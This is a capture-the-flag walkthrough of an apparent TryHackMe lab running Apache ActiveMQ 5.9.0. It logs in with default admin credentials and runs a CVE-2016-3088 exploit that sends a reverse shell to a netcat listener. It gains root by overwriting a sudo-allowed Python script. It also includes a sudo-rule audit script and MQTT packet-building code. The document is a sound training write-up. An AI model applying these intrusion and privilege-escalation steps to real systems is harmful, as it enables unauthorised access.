The creator gives us many hints in this room, starting with the room description, notes and flag hints.
Paul and Max use a rather unconventional way to chat. They do not seem to know
that eavesdropping is possible though…
Task 2 Enumeration & flags
Paul and Max found a way to chat at work by using a certain kind of software.
They think they outsmarted their boss, but do not seem to know that eavesdropping
is quite possible… They better be careful…
Do a TCP portscan on all ports with port number greater than 1000 and smaller
than 10000! Which TCP ports do you find to be open? (counting up)
Hint: nmap -p1001-9999 IP
What is the name of the software they use?
Hint: running on one of the ports you found in question 1
Which videogame are Paul and Max talking about?
Use a MQTT client. Note: MQTT Explorer does not work. Also only use MQTT
version 3.1 as the protocol version.
CVE for the software you found in question 2
Another important hint is how TryHackMe classifies this room. Go to “All Rooms” and search for this specific room: it is classified as message broker.
First, you need to choose whether to add a domain entry in /etc/hosts or use the room IP directly in each command. For simplicity in this writeup I chose to add the domain name broker.thm to my /etc/hosts.
echo "[Room IP] broker.thm" | sudo tee -a /etc/hosts
Let’s follow the basic hacker methodology
In this room we will use the first three steps of the basic hacker methodology: recon, exploitation and privilege elevation.
Phase 1: recon
Start scanning for open ports and running services.
sudo nmap -sS -sV -T4 --open -Pn -p 1000-10000 broker.thm
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-03-11 07:43 EST
Nmap scan report for broker.thm (10.10.56.121)
Host is up (0.15s latency).
Not shown: 8999 closed ports
PORT     STATE SERVICE VERSION
1883/tcp open  mqtt?
8161/tcp open  http    Jetty 7.6.9.v20130131
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 85.08 seconds
There are 2 open ports. Port 1883 is reported as mqtt? and port 8161 runs Jetty. Searching the web, Jetty is a Java HTTP web server and MQTT stands for Message Queuing Telemetry Transport, a publish-subscribe network protocol.
Open the browser on port 8161.
Clicking on “Manage ActiveMQ broker”, we get a basic authentication prompt.
Phase 2: exploitation
Whenever you find a default page with authentication, it is worth searching for default passwords. In this case, I found that the default credentials are username admin, password admin.
We are in the ActiveMQ admin page; the version is 5.9.0. Searching the Exploit Database I found a Metasploit module for this service and version, Apache ActiveMQ 5.x-5.11.1 – Directory Traversal Shell Upload (Metasploit); unfortunately this module does not work on this host.
Searching a little more, I found this page describing the Analysis of Apache ActiveMQ Remote Code Execution Vulnerability (CVE-2016–3088), which explains how to exploit this vulnerability.
For me this was the way; I recommend you read the page and learn all the steps needed to exploit this vulnerability.
But after finishing this room I wrote a simple exploit to do this work automatically.
So, let’s do it.
Open a new terminal window and start a netcat service.
nc -nvlp 1234
This is the script.
python3 exploit_activemq.py
Developed by @cyberaguiar - www.cyberaguiar.com
-----------------------------------------------------------------------
** Disclaimer **
-----------------------------------------------------------------------
The developer of this script are not responsible for any misuse of this exploit we only encourage the ethical use of this script and to be used only when authorised to do so during an penetration test or similar. Any damages or misuse of this script is the responsibility of the individuals who use them unethically or with the intent to damage property.
-----------------------------------------------------------------------
USAGE: python exploit_activemq.py rhost rport username password lhost lport
You will need to replace the local VPN IP in the command below with your own.
python3 exploit_activemq.py broker.thm 8161 admin admin 10.6.10.10 1234
Voilà, we have a shell.
Start a nice bash shell with python3.
python3 -c "import pty;pty.spawn('/bin/bash')"; export TERM=xterm
Before continuing, there is a question in the room about the game Paul and Max were talking about. The room creators probably expect us to use an MQTT client against the queue service to read those messages. Since we went directly to the server, this was not needed, but at the end of this writeup I will show how to do it.
ls -l
total 9968
-rw-r--r-- 1 activemq activemq    40580 Oct 14  2013 LICENSE
-rw-r--r-- 1 activemq activemq     3334 Oct 14  2013 NOTICE
-rw-r--r-- 1 activemq activemq     2610 Oct 14  2013 README.txt
-rwxr-xr-x 1 activemq activemq 10105484 Oct 14  2013 activemq-all-5.9.0.jar
drwxr-xr-x 1 activemq activemq     4096 Dec 25 18:17 bin
-rw-rw-r-- 1 activemq activemq     1443 Dec 25 17:50 chat.py
drwxr-xr-x 1 activemq activemq     4096 Dec 25 18:16 conf
drwxr-xr-x 1 activemq activemq     4096 Dec 26 04:45 data
-rw-r--r-- 1 activemq activemq       23 Dec 25 18:16 flag.txt
drwxr-xr-x 1 activemq activemq     4096 Dec 25 18:16 lib
-r-x------ 1 activemq activemq      143 Dec 25 17:50 start.sh
-rw-rw-r-- 1 activemq activemq      768 Dec 25 17:50 subscribe.py
drwxr-sr-x 5 activemq activemq     4096 Mar 11 12:39 tmp
drwxr-xr-x 1 activemq activemq     4096 Dec 25 18:17 webapps
Here is flag.txt; also take a look at the chat.py file. Inside are the messages from Paul and Max chatting about some videogame.
Phase 3: privilege elevation
sudo -l
Matching Defaults entries for activemq on activemq:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User activemq may run the following commands on activemq:
    (root) NOPASSWD: /usr/bin/python3.7 /opt/apache-activemq-5.9.0/subscribe.py
ls -lha /opt/apache-activemq-5.9.0/subscribe.py
-rw-rw-r-- 1 activemq activemq 768 Dec 25 17:50 /opt/apache-activemq-5.9.0/subscribe.py
You can execute the script above as root and also have write access to the file. Now let’s replace the content of the script to make it execute bash as root.
echo "import pty;pty.spawn('/bin/bash')" > /opt/apache-activemq-5.9.0/subscribe.py
sudo /usr/bin/python3.7 /opt/apache-activemq-5.9.0/subscribe.py
root@activemq:/# cat /root/root.txt
ROOT_FLAG
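As an added check, not part of the original writeup: a small Python audit that parses `sudo -l` output and flags interpreter rules whose script argument the calling user can modify, which is exactly the misconfiguration above (subscribe.py is mode 0664 and owned by the same user that may run it as root). The temporary file in `demo()` is constructed for the illustration; only Linux file ownership and mode bits are consulted.

```python
import os
import re
import stat
import tempfile

# One rule line of `sudo -l` output, e.g.
#   (root) NOPASSWD: /usr/bin/python3.7 /opt/apache-activemq-5.9.0/subscribe.py
RULE_RE = re.compile(r"^\((?P<runas>[^)]+)\)\s+(?:\w+:\s*)*(?P<cmd>/.*)$")
INTERPRETERS = ("python", "perl", "ruby", "bash", "sh")

def parse_sudo_l(output):
    """Return (runas, command, args) for every rule line in `sudo -l` output."""
    rules = []
    for line in output.splitlines():
        m = RULE_RE.match(line.strip())
        if m:
            parts = m.group("cmd").split()
            rules.append((m.group("runas").strip(), parts[0], parts[1:]))
    return rules

def writable_by(path, uid, gids):
    """True if uid (member of gids) can write path, judged from owner and mode bits."""
    st = os.stat(path)
    if st.st_uid == uid and st.st_mode & stat.S_IWUSR:
        return True
    if st.st_gid in gids and st.st_mode & stat.S_IWGRP:
        return True
    return bool(st.st_mode & stat.S_IWOTH)

def find_writable_targets(output, uid=None, gids=None):
    """Scripts passed to an interpreter in a sudo rule that the calling user can modify."""
    uid = os.getuid() if uid is None else uid
    gids = set(os.getgroups()) if gids is None else set(gids)
    findings = []
    for runas, cmd, args in parse_sudo_l(output):
        if not os.path.basename(cmd).startswith(INTERPRETERS):
            continue  # a non-interpreter binary does not take a script argument
        for arg in args:
            if os.path.isfile(arg) and writable_by(arg, uid, gids):
                findings.append((runas, cmd, arg))
    return findings

def demo():
    """Constructed case: a temp script with subscribe.py's 0664 mode, then read-only 0444."""
    fd, path = tempfile.mkstemp(suffix=".py")
    os.close(fd)
    rule = f"User activemq may run the following commands on activemq:\n    (root) NOPASSWD: /usr/bin/python3.7 {path}\n"
    counts = []
    for mode in (0o664, 0o444):
        os.chmod(path, mode)
        counts.append(len(find_writable_targets(rule)))
    os.unlink(path)
    return counts  # [1, 0]
```

Run `find_writable_targets` on the real `sudo -l` text to get the list of (runas, interpreter, script) triples; an empty list means every script in a NOPASSWD interpreter rule is read-only for the current user.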
Optional step, read the messages from ActiveMQ using a MQTT client
Download this mqtt client
git clone https://github.com/bapowell/python-mqtt-client-shell
Cloning into 'python-mqtt-client-shell'...
remote: Enumerating objects: 111, done.
remote: Total 111 (delta 0), reused 0 (delta 0), pack-reused 111
Receiving objects: 100% (111/111), 35.95 KiB | 624.00 KiB/s, done.
Resolving deltas: 100% (65/65), done.
cd python-mqtt-client-shell
python3 mqtt_client_shell.py
Welcome to the MQTT client shell. Type help or ? to list commands.
Pressing <Enter> on an empty line will repeat the last command.
Client args: client_id=paho-6315-kali, clean_session=True, protocol=4 (MQTTv3.1.1), transport=tcp
Logging: on (indent=30), Recording: off, Pacing: 0
>
Now execute the commands below.
protocol 3
connection
host broker.thm
connect
subscribe #
Done, now you are connected and the messages will start rolling in.
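The protocol detail behind the “use MQTT version 3.1” note, as an added example that is not part of the original writeup: MQTT 3.1 announces itself in the CONNECT packet with the protocol name MQIsdp and level 3, while 3.1.1 sends MQTT and level 4, which is what the `protocol 3` setting in the client shell changes. The functions below build the CONNECT and SUBSCRIBE frames that `connect` / `subscribe #` send and decode a PUBLISH frame of the kind the broker delivers to a subscriber; the client id and the sample PUBLISH are constructed, not captured from the room.

```python
import struct

# MQTT 3.1 and 3.1.1 differ in the CONNECT variable header: protocol name and level.
PROTOCOLS = {3: b"MQIsdp", 4: b"MQTT"}

def mqtt_string(data):
    """UTF-8 string field: 2-byte big-endian length prefix followed by the bytes."""
    return struct.pack("!H", len(data)) + data

def remaining_length(n):
    """Variable-length integer used in every MQTT fixed header (7 data bits per byte)."""
    out = bytearray()
    while True:
        byte, n = n % 128, n // 128
        out.append(byte | 0x80 if n else byte)
        if not n:
            return bytes(out)

def connect_packet(client_id, level=3, keepalive=60):
    """CONNECT with clean session and no credentials; level 3 = MQTT 3.1, 4 = MQTT 3.1.1."""
    var_header = (mqtt_string(PROTOCOLS[level]) + bytes([level, 0x02])
                  + struct.pack("!H", keepalive))
    body = var_header + mqtt_string(client_id.encode())
    return b"\x10" + remaining_length(len(body)) + body

def subscribe_packet(topic_filter, packet_id=1):
    """SUBSCRIBE at QoS 0 to one topic filter; "#" matches every topic on the broker."""
    body = struct.pack("!H", packet_id) + mqtt_string(topic_filter.encode()) + b"\x00"
    return b"\x82" + remaining_length(len(body)) + body

def parse_publish(packet):
    """Decode a QoS 0 PUBLISH (what a subscriber receives) into (topic, payload)."""
    if packet[0] & 0xF0 != 0x30 or packet[0] & 0x06:
        raise ValueError("not a QoS 0 PUBLISH packet")
    i, length, mult = 1, 0, 1
    while True:  # decode the variable-length remaining length
        b = packet[i]
        i += 1
        length += (b & 0x7F) * mult
        mult *= 128
        if not b & 0x80:
            break
    body = packet[i:i + length]
    topic_len = struct.unpack("!H", body[:2])[0]
    return body[2:2 + topic_len].decode(), body[2 + topic_len:]

if __name__ == "__main__":
    print(connect_packet("kali", level=3).hex())   # what `protocol 3` sends
    print(connect_packet("kali", level=4).hex())   # the 3.1.1 form the shell uses by default
    print(subscribe_packet("#").hex())
    # constructed sample frame, not a capture from the room
    print(parse_publish(b"\x30\x0c\x00\x04chat" + b"hello!"))
```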
That is it guys and girls, we're done.
See ya in the next challenge.